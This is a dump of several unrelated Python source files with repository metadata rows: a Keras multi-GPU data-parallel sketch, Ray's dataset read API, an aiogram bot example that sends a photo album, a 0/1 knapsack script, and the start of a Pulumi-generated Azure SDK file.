            norm = K.sqrt(sum([K.sum(K.square(g)) for g in grads]))
            grads = [clip_norm(g, self.clipnorm, norm) for g in grads]
        if hasattr(self, 'clipvalue') and self.clipvalue > 0:
            grads = [K.clip(g, -self.clipvalue, self.clipvalue) for g in grads]
        return grads

    def get_updates(self, params, constraints, loss):
        # Delegate construction of the weight-update ops to the wrapped optimizer.
        return self.optimizer.get_updates(params, constraints, loss)

    @property
    def weights(self):
        # BUG FIX: the original called `self.optimizer.weights()` -- `weights`
        # is a property, not a callable -- and also dropped the return value.
        return self.optimizer.weights

    def get_config(self):
        # BUG FIX: the original dropped the return value.
        return self.optimizer.get_config()

    def from_config(self, config):
        # BUG FIX: the original ignored `config` and dropped the return value.
        return self.optimizer.from_config(config)
# so far just an incomplete sketch...
class DataParallelModel(Model):
    """Keras Model that replicates `basic_model` across GPUs.

    Each replica (tower) processes a slice of the input batch on its own
    device; the sliced outputs are concatenated back on gpu:0.
    """

    def __init__(self, inputs, outputs, basic_model, replicas, name=None):
        super(DataParallelModel, self).__init__(inputs, outputs, name)
        self.basic_model = basic_model   # the shared-weight single-device model
        self.replicas = replicas         # per-GPU Model wrappers around basic_model

    @classmethod
    def create(cls, basic_model, gpu_count=2):
        """Build a data-parallel model from `basic_model` over `gpu_count` GPUs."""
        assert gpu_count >= 2, "At least 2 GPUs"

        def get_slice(data, idx, parts):
            # Take the idx-th contiguous 1/parts slice along the batch axis.
            # NOTE(review): uses integer division, so a batch size not
            # divisible by `parts` drops trailing samples -- confirm intended.
            shape = tf.shape(data)
            size = tf.concat([shape[:1] // parts, shape[1:]], axis=0)
            stride = tf.concat([shape[:1] // parts, shape[1:] * 0], axis=0)
            start = stride * idx
            return tf.slice(data, start, size)

        outputs_all = []
        replicas = []
        # place operations for replica on a separate device
        for gpu_id in range(gpu_count):
            with tf.device("gpu:%d" % gpu_id):
                with tf.name_scope('replica_%d' % gpu_id):
                    slices = []
                    # Slice each input into a piece for processing on this GPU
                    for x in basic_model.inputs:
                        input_shape = tuple(x.get_shape().as_list())[1:]
                        slice = Lambda(get_slice, output_shape=input_shape,
                                       arguments={'idx': gpu_id, 'parts': gpu_count})(x)
                        slices.append(slice)

                    # One output bucket per model output (created on first tower).
                    if gpu_id == 0:
                        for i in range(len(basic_model.outputs)):
                            outputs_all.append([])

                    outputs = basic_model(slices)
                    replica = Model(inputs=basic_model.inputs, outputs=outputs)
                    replicas.append(replica)

                    if not isinstance(outputs, list):
                        outputs = [outputs]

                    # Save all the outputs for merging back together later
                    for l in range(len(outputs)):
                        outputs_all[l].append(outputs[l])

        # Merge the per-tower output slices back into full-batch outputs.
        with tf.device("gpu:0"):
            merged = []
            for outputs in outputs_all:
                merged.append(concatenate(outputs, axis=0))

        return cls(inputs=basic_model.inputs, outputs=merged,
                   basic_model=basic_model, replicas=replicas)

    def compile(self, optimizer, loss, metrics=None, loss_weights=None,
                sample_weight_mode=None, **kwargs):
        """
        optimizer - identifier or instance of an optimizer
        loss - identifier or instance of a loss function
        """
        # Avoid storing optimizer variables in multiple replicas.
        # Let's initialize it now on the PS device.
        with tf.device("gpu:0"):
            optimizer = keras.optimizers.get(optimizer)

        replica_total_losses = []
        # place the loss and gradient operations for replica on a separate device
        for gpu_id, replica in enumerate(self.replicas):
            with tf.device("gpu:%d" % gpu_id):
                with tf.name_scope('replica_%d' % gpu_id):
                    replica.compile(optimizer, loss, metrics, loss_weights)
                    replica_total_losses.append(replica.total_loss)

        # Wrap the optimizer so it can consume a list of per-tower losses.
        super(DataParallelModel, self).compile(
            DataParallelOptimizer(optimizer), loss, metrics, loss_weights)
        # separate losses whose gradient can be computed in parallel
        self.replica_total_losses = replica_total_losses
        # redefine total_loss with the average of replica losses
        self.total_loss = K.mean(K.stack(replica_total_losses, 0))

    def _make_train_function(self):
        # Mirrors keras.Model._make_train_function, but feeds the list of
        # per-replica losses to the DataParallelOptimizer.
        if not hasattr(self, 'train_function'):
            raise RuntimeError('You must compile your model before using it.')
        if self.train_function is None:
            inputs = self._feed_inputs + self._feed_targets + self._feed_sample_weights
            if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
                inputs += [K.learning_phase()]

            assert isinstance(self.optimizer, DataParallelOptimizer)
            training_updates = self.optimizer.get_updates(
                self._collected_trainable_weights,
                self.constraints,
                self.replica_total_losses)
            updates = self.updates + training_updates

            # Gets loss and metrics. Updates weights at each call.
            self.train_function = K.function(inputs,
                                             [self.total_loss] + self.metrics_tensors,
                                             updates=updates,
                                             name='train_function',
                                             **self._function_kwargs)
# TODO: in ModelCheckpointer save the basic_model
| 43.046512 | 87 | 0.60913 |
8d1b66d04c044786e775b3d6349f0b1405e748bb | 21,909 | py | Python | python/ray/data/read_api.py | odp/ray | ab55b808c56f9e23af575fa1b1c1948e44c7e36a | [
"Apache-2.0"
] | null | null | null | python/ray/data/read_api.py | odp/ray | ab55b808c56f9e23af575fa1b1c1948e44c7e36a | [
"Apache-2.0"
] | 24 | 2021-10-30T07:09:36.000Z | 2022-03-12T08:09:04.000Z | python/ray/data/read_api.py | sasha-s/ray | 635010d460ba266b56fc857e56af8272ae08df8c | [
"Apache-2.0"
] | null | null | null | import itertools
import logging
from typing import List, Any, Dict, Union, Optional, Tuple, Callable, \
TypeVar, TYPE_CHECKING
import numpy as np
if TYPE_CHECKING:
import pyarrow
import pandas
import dask
import mars
import modin
import pyspark
import ray
from ray.types import ObjectRef
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.data.block import Block, BlockAccessor, BlockMetadata
from ray.data.dataset import Dataset
from ray.data.datasource import Datasource, RangeDatasource, \
JSONDatasource, CSVDatasource, ParquetDatasource, BinaryDatasource, \
NumpyDatasource, ReadTask
from ray.data.impl.arrow_block import ArrowRow, \
DelegatingArrowBlockBuilder
from ray.data.impl.block_list import BlockList
from ray.data.impl.lazy_block_list import LazyBlockList
from ray.data.impl.remote_fn import cached_remote_fn
from ray.data.impl.util import _get_spread_resources_iter
T = TypeVar("T")
logger = logging.getLogger(__name__)
@PublicAPI(stability="beta")
def from_items(items: List[Any], *, parallelism: int = 200) -> Dataset[Any]:
    """Build a dataset from local Python objects.

    The items are chunked into roughly ``parallelism`` blocks, each stored
    in the object store.

    Examples:
        >>> ray.data.from_items([1, 2, 3, 4, 5])

    Args:
        items: List of local Python objects.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding the items.
    """
    block_size = max(1, len(items) // parallelism)

    blocks: List[ObjectRef[Block]] = []
    metadata: List[BlockMetadata] = []
    for start in range(0, len(items), block_size):
        builder = DelegatingArrowBlockBuilder()
        for item in items[start:start + block_size]:
            builder.add(item)
        block = builder.build()
        blocks.append(ray.put(block))
        metadata.append(
            BlockAccessor.for_block(block).get_metadata(input_files=None))

    return Dataset(BlockList(blocks, metadata))
@PublicAPI(stability="beta")
def range(n: int, *, parallelism: int = 200) -> Dataset[int]:
    """Create a dataset of the integers ``0`` through ``n - 1``.

    Examples:
        >>> ray.data.range(10000).map(lambda x: x * 2).show()

    Args:
        n: The upper bound of the range of integers.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding the integers.
    """
    datasource = RangeDatasource()
    return read_datasource(
        datasource, parallelism=parallelism, n=n, block_format="list")
@PublicAPI(stability="beta")
def range_arrow(n: int, *, parallelism: int = 200) -> Dataset[ArrowRow]:
    """Create an Arrow dataset of the integers ``0`` through ``n - 1``.

    Like :func:`range`, but the integers are stored as Arrow records of
    the form ``{"value": N}``.

    Examples:
        >>> ds = ray.data.range_arrow(1000)
        >>> ds.map(lambda r: {"v2": r["value"] * 2}).show()

    Args:
        n: The upper bound of the range of integer records.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding the integers as Arrow records.
    """
    datasource = RangeDatasource()
    return read_datasource(
        datasource, parallelism=parallelism, n=n, block_format="arrow")
@PublicAPI(stability="beta")
def range_tensor(n: int, *, shape: Tuple = (1, ),
                 parallelism: int = 200) -> Dataset[np.ndarray]:
    """Create a tensor dataset of the integers ``0`` through ``n - 1``.

    Like :func:`range`, but each record is an ndarray; the dataset has
    overall shape ``(n,) + shape``.

    Examples:
        >>> ds = ray.data.range_tensor(1000, shape=(3, 10))
        >>> ds.map_batches(lambda arr: arr ** 2).show()

    Args:
        n: The upper bound of the range of integer records.
        shape: The shape of each record.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding the integers as tensors.
    """
    record_shape = tuple(shape)
    return read_datasource(
        RangeDatasource(),
        parallelism=parallelism,
        n=n,
        block_format="tensor",
        tensor_shape=record_shape)
@PublicAPI(stability="beta")
def read_datasource(datasource: Datasource[T],
                    *,
                    parallelism: int = 200,
                    ray_remote_args: Dict[str, Any] = None,
                    _spread_resource_prefix: Optional[str] = None,
                    **read_args) -> Dataset[T]:
    """Read a dataset from a custom data source.

    Args:
        datasource: The datasource to read data from.
        parallelism: The requested parallelism of the read.
        read_args: Additional kwargs to pass to the datasource impl.
        ray_remote_args: kwargs passed to ray.remote in the read tasks.

    Returns:
        Dataset holding the data read from the datasource.
    """
    read_tasks = datasource.prepare_read(parallelism, **read_args)

    # Thin wrapper so each ReadTask executes inside a Ray task.
    def remote_read(task: ReadTask) -> Block:
        return task()

    if ray_remote_args is None:
        ray_remote_args = {}
    # Increase the read parallelism by default to maximize IO throughput. This
    # is particularly important when reading from e.g., remote storage.
    if "num_cpus" not in ray_remote_args:
        # Note that the too many workers warning triggers at 4x subscription,
        # so we go at 0.5 to avoid the warning message.
        ray_remote_args["num_cpus"] = 0.5
    remote_read = cached_remote_fn(remote_read)

    if _spread_resource_prefix is not None:
        # Use given spread resource prefix for round-robin resource-based
        # scheduling.
        nodes = ray.nodes()
        resource_iter = _get_spread_resources_iter(
            nodes, _spread_resource_prefix, ray_remote_args)
    else:
        # If no spread resource prefix given, yield an empty dictionary.
        resource_iter = itertools.repeat({})

    calls: List[Callable[[], ObjectRef[Block]]] = []
    metadata: List[BlockMetadata] = []

    for task in read_tasks:
        # Default arguments bind `task` and the next resource dict at lambda
        # definition time; the read itself stays lazy until the call is made.
        calls.append(
            lambda task=task,
            resources=next(resource_iter): remote_read.options(
                **ray_remote_args,
                resources=resources).remote(task))
        metadata.append(task.get_metadata())

    block_list = LazyBlockList(calls, metadata)

    # Get the schema from the first block synchronously.
    if metadata and metadata[0].schema is None:
        get_schema = cached_remote_fn(_get_schema)
        # next(iter(block_list)) forces only the first block to be read.
        schema0 = ray.get(get_schema.remote(next(iter(block_list))))
        block_list.set_metadata(
            0,
            BlockMetadata(
                num_rows=metadata[0].num_rows,
                size_bytes=metadata[0].size_bytes,
                schema=schema0,
                input_files=metadata[0].input_files,
            ))

    return Dataset(block_list)
@PublicAPI(stability="beta")
def read_parquet(paths: Union[str, List[str]],
                 *,
                 filesystem: Optional["pyarrow.fs.FileSystem"] = None,
                 columns: Optional[List[str]] = None,
                 parallelism: int = 200,
                 ray_remote_args: Dict[str, Any] = None,
                 _tensor_column_schema: Optional[Dict[str, Tuple[
                     np.dtype, Tuple[int, ...]]]] = None,
                 **arrow_parquet_args) -> Dataset[ArrowRow]:
    """Create an Arrow dataset from parquet files.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_parquet("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_parquet(["/path/to/file1", "/path/to/file2"])

    Args:
        paths: A single file path or a list of file paths (or directories).
        filesystem: The filesystem implementation to read from.
        columns: A list of column names to read.
        parallelism: The amount of parallelism to use for the dataset.
        ray_remote_args: kwargs passed to ray.remote in the read tasks.
        _tensor_column_schema: A dict of column name --> tensor dtype and shape
            mappings for converting a Parquet column containing serialized
            tensors (ndarrays) as their elements to our tensor column extension
            type. This assumes that the tensors were serialized in the raw
            NumPy array format in C-contiguous order (e.g. via
            `arr.tobytes()`).
        arrow_parquet_args: Other parquet read options to pass to pyarrow.

    Returns:
        Dataset holding Arrow records read from the specified paths.
    """
    if _tensor_column_schema is not None:
        # Preserve any caller-supplied block UDF; it is applied after the
        # tensor-column cast below.
        existing_block_udf = arrow_parquet_args.pop("_block_udf", None)

        def _block_udf(block: "pyarrow.Table") -> "pyarrow.Table":
            from ray.data.extensions import ArrowTensorArray

            for tensor_col_name, (dtype,
                                  shape) in _tensor_column_schema.items():
                # NOTE(Clark): We use NumPy to consolidate these potentially
                # non-contiguous buffers, and to do buffer bookkeeping in
                # general.
                np_col = np.array([
                    np.ndarray(shape, buffer=buf.as_buffer(), dtype=dtype)
                    for buf in block.column(tensor_col_name)
                ])

                block = block.set_column(
                    block._ensure_integer_index(tensor_col_name),
                    tensor_col_name, ArrowTensorArray.from_numpy(np_col))
            if existing_block_udf is not None:
                # Apply UDF after casting the tensor columns.
                block = existing_block_udf(block)
            return block

        arrow_parquet_args["_block_udf"] = _block_udf

    return read_datasource(
        ParquetDatasource(),
        parallelism=parallelism,
        paths=paths,
        filesystem=filesystem,
        columns=columns,
        ray_remote_args=ray_remote_args,
        **arrow_parquet_args)
@PublicAPI(stability="beta")
def read_json(paths: Union[str, List[str]],
              *,
              filesystem: Optional["pyarrow.fs.FileSystem"] = None,
              parallelism: int = 200,
              ray_remote_args: Dict[str, Any] = None,
              **arrow_json_args) -> Dataset[ArrowRow]:
    """Create an Arrow dataset from JSON files.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_json("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_json(["/path/to/file1", "/path/to/file2"])

        >>> # Read multiple directories.
        >>> ray.data.read_json(["s3://bucket/path1", "s3://bucket/path2"])

    Args:
        paths: A single file/directory path or a list of file/directory paths.
            A list of paths can contain both files and directories.
        filesystem: The filesystem implementation to read from.
        parallelism: The amount of parallelism to use for the dataset.
        ray_remote_args: kwargs passed to ray.remote in the read tasks.
        arrow_json_args: Other json read options to pass to pyarrow.

    Returns:
        Dataset holding Arrow records read from the specified paths.
    """
    datasource = JSONDatasource()
    return read_datasource(
        datasource,
        parallelism=parallelism,
        paths=paths,
        filesystem=filesystem,
        ray_remote_args=ray_remote_args,
        **arrow_json_args)
@PublicAPI(stability="beta")
def read_csv(paths: Union[str, List[str]],
             *,
             filesystem: Optional["pyarrow.fs.FileSystem"] = None,
             parallelism: int = 200,
             ray_remote_args: Dict[str, Any] = None,
             **arrow_csv_args) -> Dataset[ArrowRow]:
    """Create an Arrow dataset from CSV files.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_csv("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_csv(["/path/to/file1", "/path/to/file2"])

        >>> # Read multiple directories.
        >>> ray.data.read_csv(["s3://bucket/path1", "s3://bucket/path2"])

    Args:
        paths: A single file/directory path or a list of file/directory paths.
            A list of paths can contain both files and directories.
        filesystem: The filesystem implementation to read from.
        parallelism: The amount of parallelism to use for the dataset.
        ray_remote_args: kwargs passed to ray.remote in the read tasks.
        arrow_csv_args: Other csv read options to pass to pyarrow.

    Returns:
        Dataset holding Arrow records read from the specified paths.
    """
    datasource = CSVDatasource()
    return read_datasource(
        datasource,
        parallelism=parallelism,
        paths=paths,
        filesystem=filesystem,
        ray_remote_args=ray_remote_args,
        **arrow_csv_args)
@PublicAPI(stability="beta")
def read_text(
        paths: Union[str, List[str]],
        *,
        encoding: str = "utf-8",
        filesystem: Optional["pyarrow.fs.FileSystem"] = None,
        parallelism: int = 200,
) -> Dataset[str]:
    """Create a dataset of text lines from the given files.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_text("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_text(["/path/to/file1", "/path/to/file2"])

    Args:
        paths: A single file path or a list of file paths (or directories).
        encoding: The encoding of the files (e.g., "utf-8" or "ascii").
        filesystem: The filesystem implementation to read from.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding lines of text read from the specified paths.
    """

    def to_lines(raw: bytes) -> List[str]:
        # Decode the whole file, then split on "\n". Note that, matching
        # str.split semantics, a trailing newline yields a final empty string.
        return raw.decode(encoding).split("\n")

    files = read_binary_files(
        paths, filesystem=filesystem, parallelism=parallelism)
    return files.flat_map(to_lines)
@PublicAPI(stability="beta")
def read_numpy(paths: Union[str, List[str]],
               *,
               filesystem: Optional["pyarrow.fs.FileSystem"] = None,
               parallelism: int = 200,
               **numpy_load_args) -> Dataset[ArrowRow]:
    """Create a tensor dataset from numpy (.npy) files.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_numpy("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_numpy(["/path/to/file1", "/path/to/file2"])

        >>> # Read multiple directories.
        >>> ray.data.read_numpy(["s3://bucket/path1", "s3://bucket/path2"])

    Args:
        paths: A single file/directory path or a list of file/directory paths.
            A list of paths can contain both files and directories.
        filesystem: The filesystem implementation to read from.
        parallelism: The amount of parallelism to use for the dataset.
        numpy_load_args: Other options to pass to np.load.

    Returns:
        Dataset holding Tensor records read from the specified paths.
    """
    datasource = NumpyDatasource()
    return read_datasource(
        datasource,
        parallelism=parallelism,
        paths=paths,
        filesystem=filesystem,
        **numpy_load_args)
@PublicAPI(stability="beta")
def read_binary_files(
        paths: Union[str, List[str]],
        *,
        include_paths: bool = False,
        filesystem: Optional["pyarrow.fs.FileSystem"] = None,
        parallelism: int = 200,
        ray_remote_args: Dict[str, Any] = None,
) -> Dataset[Union[Tuple[str, bytes], bytes]]:
    """Create a dataset from binary files of arbitrary contents.

    Examples:
        >>> # Read a directory of files in remote storage.
        >>> ray.data.read_binary_files("s3://bucket/path")

        >>> # Read multiple local files.
        >>> ray.data.read_binary_files(["/path/to/file1", "/path/to/file2"])

    Args:
        paths: A single file path or a list of file paths (or directories).
        include_paths: Whether to include the full path of the file in the
            dataset records. When specified, the dataset records will be a
            tuple of the file path and the file contents.
        filesystem: The filesystem implementation to read from.
        ray_remote_args: kwargs passed to ray.remote in the read tasks.
        parallelism: The amount of parallelism to use for the dataset.

    Returns:
        Dataset holding the raw bytes (or path/bytes tuples) read from the
        specified paths.
    """
    datasource = BinaryDatasource()
    return read_datasource(
        datasource,
        parallelism=parallelism,
        paths=paths,
        include_paths=include_paths,
        filesystem=filesystem,
        ray_remote_args=ray_remote_args,
        schema=bytes)
@PublicAPI(stability="beta")
def from_dask(df: "dask.DataFrame") -> Dataset[ArrowRow]:
    """Create a dataset from a Dask DataFrame.

    The Dask partitions are persisted via the Ray scheduler and then
    converted into dataset blocks.

    Args:
        df: A Dask DataFrame.

    Returns:
        Dataset holding Arrow records read from the DataFrame.
    """
    import dask
    from ray.util.dask import ray_dask_get

    partitions = df.to_delayed()
    persisted = dask.persist(*partitions, scheduler=ray_dask_get)

    # Each persisted delayed holds a single Ray object ref in its task graph.
    refs = []
    for part in persisted:
        refs.append(next(iter(part.dask.values())))
    return from_pandas(refs)
@PublicAPI(stability="beta")
def from_mars(df: "mars.DataFrame", *,
              parallelism: int = 200) -> Dataset[ArrowRow]:
    """Create a dataset from a MARS dataframe.

    Args:
        df: A MARS dataframe, which must be executed by MARS-on-Ray.

    Returns:
        Dataset holding Arrow records read from the dataframe.
    """
    # Not yet implemented (tracked as a P1 follow-up).
    raise NotImplementedError  # P1
@PublicAPI(stability="beta")
def from_modin(df: "modin.DataFrame") -> Dataset[ArrowRow]:
    """Create a dataset from a Modin dataframe.

    Args:
        df: A Modin dataframe, which must be using the Ray backend.

    Returns:
        Dataset holding Arrow records read from the dataframe.
    """
    from modin.distributed.dataframe.pandas.partitions import unwrap_partitions

    # Row-axis partitions are already Ray object refs to pandas dataframes.
    partition_refs = unwrap_partitions(df, axis=0)
    return from_pandas_refs(partition_refs)
@PublicAPI(stability="beta")
def from_pandas(dfs: List["pandas.DataFrame"]) -> Dataset[ArrowRow]:
    """Create a dataset from a list of Pandas dataframes.

    Args:
        dfs: A list of Pandas dataframes.

    Returns:
        Dataset holding Arrow records read from the dataframes.
    """
    # Put each dataframe in the object store, then delegate to the refs API.
    refs = [ray.put(df) for df in dfs]
    return from_pandas_refs(refs)
@DeveloperAPI
def from_pandas_refs(
        dfs: List[ObjectRef["pandas.DataFrame"]]) -> Dataset[ArrowRow]:
    """Create a dataset from a list of Ray object references to Pandas
    dataframes.

    Args:
        dfs: A list of Ray object references to pandas dataframes.

    Returns:
        Dataset holding Arrow records read from the dataframes.
    """
    df_to_block = cached_remote_fn(_df_to_block, num_returns=2)

    blocks = []
    metadata = []
    for df in dfs:
        # Each remote call returns (block_ref, metadata_ref).
        block_ref, meta_ref = df_to_block.remote(df)
        blocks.append(block_ref)
        metadata.append(meta_ref)
    return Dataset(BlockList(blocks, ray.get(metadata)))
def from_numpy(ndarrays: List[ObjectRef[np.ndarray]]) -> Dataset[ArrowRow]:
    """Create a dataset from a set of NumPy ndarrays.

    Args:
        ndarrays: A list of Ray object references to NumPy ndarrays.

    Returns:
        Dataset holding the given ndarrays.
    """
    ndarray_to_block = cached_remote_fn(_ndarray_to_block, num_returns=2)

    blocks = []
    metadata = []
    for ndarray in ndarrays:
        # Each remote call returns (block_ref, metadata_ref).
        block_ref, meta_ref = ndarray_to_block.remote(ndarray)
        blocks.append(block_ref)
        metadata.append(meta_ref)
    return Dataset(BlockList(blocks, ray.get(metadata)))
@PublicAPI(stability="beta")
def from_arrow(
        tables: List[Union["pyarrow.Table", bytes]]) -> Dataset[ArrowRow]:
    """Create a dataset from a list of Arrow tables.

    Args:
        tables: A list of Ray object references to Arrow tables,
            or its streaming format in bytes.

    Returns:
        Dataset holding Arrow records from the tables.
    """
    # Put each table in the object store, then delegate to the refs API.
    refs = [ray.put(t) for t in tables]
    return from_arrow_refs(refs)
@DeveloperAPI
def from_arrow_refs(tables: List[ObjectRef[Union["pyarrow.Table", bytes]]]
                    ) -> Dataset[ArrowRow]:
    """Create a dataset from a set of Arrow tables.

    Args:
        tables: A list of Ray object references to Arrow tables,
            or its streaming format in bytes.

    Returns:
        Dataset holding Arrow records from the tables.
    """
    get_metadata = cached_remote_fn(_get_metadata)
    # The table refs are used as the blocks directly; only metadata is computed.
    metadata_refs = [get_metadata.remote(t) for t in tables]
    return Dataset(BlockList(tables, ray.get(metadata_refs)))
@PublicAPI(stability="beta")
def from_spark(df: "pyspark.sql.DataFrame",
               *,
               parallelism: Optional[int] = None) -> Dataset[ArrowRow]:
    """Create a dataset from a Spark dataframe.

    Args:
        df: A Spark dataframe, which must be created by RayDP (Spark-on-Ray).
        parallelism: The amount of parallelism to use for the dataset.
            If not provided, it will be equal to the number of partitions of
            the original Spark dataframe.

    Returns:
        Dataset holding Arrow records read from the dataframe.
    """
    import raydp

    # RayDP handles the Spark partition -> block conversion.
    return raydp.spark.spark_dataframe_to_ray_dataset(df, parallelism)
def _df_to_block(df: "pandas.DataFrame") -> Block[ArrowRow]:
    """Convert a pandas dataframe into an Arrow block plus its metadata."""
    import pyarrow as pa

    table = pa.table(df)
    meta = BlockAccessor.for_block(table).get_metadata(input_files=None)
    return (table, meta)
def _ndarray_to_block(ndarray: np.ndarray) -> Block[np.ndarray]:
    """Wrap an ndarray in a single-column ("value") tensor-extension table."""
    import pyarrow as pa
    from ray.data.extensions import TensorArray

    table = pa.Table.from_pydict({"value": TensorArray(ndarray)})
    meta = BlockAccessor.for_block(table).get_metadata(input_files=None)
    return (table, meta)
def _get_schema(block: Block) -> Any:
    """Return the schema of ``block`` via its accessor."""
    accessor = BlockAccessor.for_block(block)
    return accessor.schema()
def _get_metadata(table: "pyarrow.Table") -> BlockMetadata:
    """Compute block metadata for ``table`` (no input files recorded)."""
    accessor = BlockAccessor.for_block(table)
    return accessor.get_metadata(input_files=None)
| 34.448113 | 79 | 0.644667 |
3d488364715b3cceb8377fa88b63fd3258c1b241 | 1,170 | py | Python | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 2,744 | 2017-11-19T00:56:19.000Z | 2022-03-31T15:48:23.000Z | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 513 | 2018-01-23T16:52:59.000Z | 2022-03-27T01:50:30.000Z | examples/media_group.py | andrew-ld/aiogram | b55153ccf3ab9ef191bef6c20e467b92f3b270ed | [
"MIT"
] | 813 | 2017-12-05T06:49:48.000Z | 2022-03-29T15:47:50.000Z | import asyncio
from aiogram import Bot, Dispatcher, executor, filters, types
API_TOKEN = 'BOT_TOKEN_HERE'
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(filters.CommandStart())
async def send_welcome(message: types.Message):
    """Reply to /start with a teaser message followed by a photo album."""
    # So... At first I want to send something like this:
    await message.reply("Do you want to see many pussies? Are you ready?")

    # Wait a little...
    await asyncio.sleep(1)

    # Good bots should send chat actions...
    await types.ChatActions.upload_photo()

    # Build the album: local files and URLs both work
    # (a Telegram '<file_id>' string would also be accepted).
    media = types.MediaGroup()
    attachments = [
        (types.InputFile('data/cat.jpg'), 'Cat!'),
        (types.InputFile('data/cats.jpg'), 'More cats!'),
        ('http://lorempixel.com/400/200/cats/', 'Random cat.'),
    ]
    for photo, caption in attachments:
        media.attach_photo(photo, caption)

    # Done! Send media group
    await message.reply_media_group(media=media)
if __name__ == '__main__':
    # Start long polling; skip_updates drops updates received while offline.
    executor.start_polling(dp, skip_updates=True)
| 26.590909 | 76 | 0.691453 |
604bcaa13f3d936d9e39424083f39d77064dbfec | 887 | py | Python | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | 1 | 2021-02-10T18:14:55.000Z | 2021-02-10T18:14:55.000Z | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | null | null | null | dynamicProgramming/knapsack/knapsack.py | G-MontaG/leetcode | 444e8ee3f395c191a86eae0e42d028060ecd1686 | [
"MIT"
] | null | null | null | # | Item | Weight | Value |
# 0/1 knapsack solved with bottom-up dynamic programming.
#
# Example instance:
# | Item | Weight | Value |
# |------|--------|-------|
# | 1    | 2      | 1     |
# | 2    | 10     | 20    |
# | 3    | 3      | 3     |
# | 4    | 6      | 14    |
# | 5    | 18     | 100   |


def solve_knapsack(weights, values, capacity):
    """Return the maximum total value achievable within `capacity`.

    Args:
        weights: per-item weights (parallel to `values`).
        values: per-item values.
        capacity: non-negative integer weight capacity.

    Returns:
        Maximum total value of any subset of items whose combined weight
        does not exceed `capacity`.
    """
    n = len(weights)
    # K[i][w] = best value using only the first i items with capacity w.
    K = [[0] * (capacity + 1) for _ in range(n + 1)]

    for i in range(1, n + 1):
        wi = weights[i - 1]
        vi = values[i - 1]
        for w in range(1, capacity + 1):
            if wi <= w:
                # Either take item i (solving for the remaining capacity)
                # or skip it -- whichever yields more value.
                K[i][w] = max(K[i - 1][w - wi] + vi, K[i - 1][w])
            else:
                K[i][w] = K[i - 1][w]

    # Optional: the full table K can be inspected here for debugging,
    # e.g. print(pandas.DataFrame(K)).
    return K[n][capacity]


item_weights = [2, 10, 3, 6, 18]
item_values = [1, 20, 3, 14, 100]
W = 15  # total weight capacity

# Results
print("Result: ", solve_knapsack(item_weights, item_values, W))
| 24.638889 | 63 | 0.472379 |
24059c699a1309924ad46a76693e23c5834c66b6 | 35 | py | Python | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | 2 | 2021-12-02T22:11:16.000Z | 2022-01-24T14:04:02.000Z | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | null | null | null | __init__.py | Robaina/filterSAM | e1a545296eb7826f7f61cef483bf228477d27ebe | [
"CC-BY-4.0"
] | null | null | null | from .filtersam.filtersam import *
| 17.5 | 34 | 0.8 |
b876136cee9df3622810faa47665a2c25c920a3a | 6,344 | py | Python | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/cognitiveservices/v20160201preview/get_cognitive_services_account.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetCognitiveServicesAccountResult',
'AwaitableGetCognitiveServicesAccountResult',
'get_cognitive_services_account',
]
@pulumi.output_type
class GetCognitiveServicesAccountResult:
    """
    Cognitive Services Account is an Azure resource representing the provisioned account, its type, location and SKU.
    """
    def __init__(__self__, endpoint=None, etag=None, kind=None, location=None, name=None, provisioning_state=None, sku=None, tags=None, type=None):
        # Validate and store every argument in declaration order.  Matching
        # the generated code, only truthy values are type-checked, and every
        # value (including None) is recorded via pulumi.set().
        for arg_name, value, expected in (
                ('endpoint', endpoint, str),
                ('etag', etag, str),
                ('kind', kind, str),
                ('location', location, str),
                ('name', name, str),
                ('provisioning_state', provisioning_state, str),
                ('sku', sku, dict),
                ('tags', tags, dict),
                ('type', type, str)):
            if value and not isinstance(value, expected):
